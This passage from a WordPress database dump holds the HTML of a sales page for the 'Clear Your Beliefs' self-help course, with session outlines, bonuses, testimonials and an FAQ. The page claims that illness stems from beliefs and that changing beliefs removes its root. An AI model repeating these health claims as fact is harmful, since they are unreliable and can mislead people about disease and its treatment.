programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Sample Program Page', '', 'publish', 'closed', 'open', '', 'sample-program-page', '', '', '2014-12-11 23:50:56', '2014-12-12 04:50:56', '', 0, 'http://clearyourbeliefs.com/?page_id=2009', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2012, 2, '2014-12-11 23:50:11', '2014-12-12 04:50:11', '&nbsp;\n&nbsp;&nbsp;\n\n&nbsp;\n&nbsp;&nbsp;\n\n&nbsp;\n\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;', 'Sample Program Page', '', 'inherit', 'closed', 'open', '', '2009-revision-v1', '', '', '2014-12-11 23:50:11', '2014-12-12 04:50:11', '', 2009, 'http://clearyourbeliefs.com/2009-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2010, 2, '2014-12-11 23:48:03', '2014-12-12 04:48:03', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what 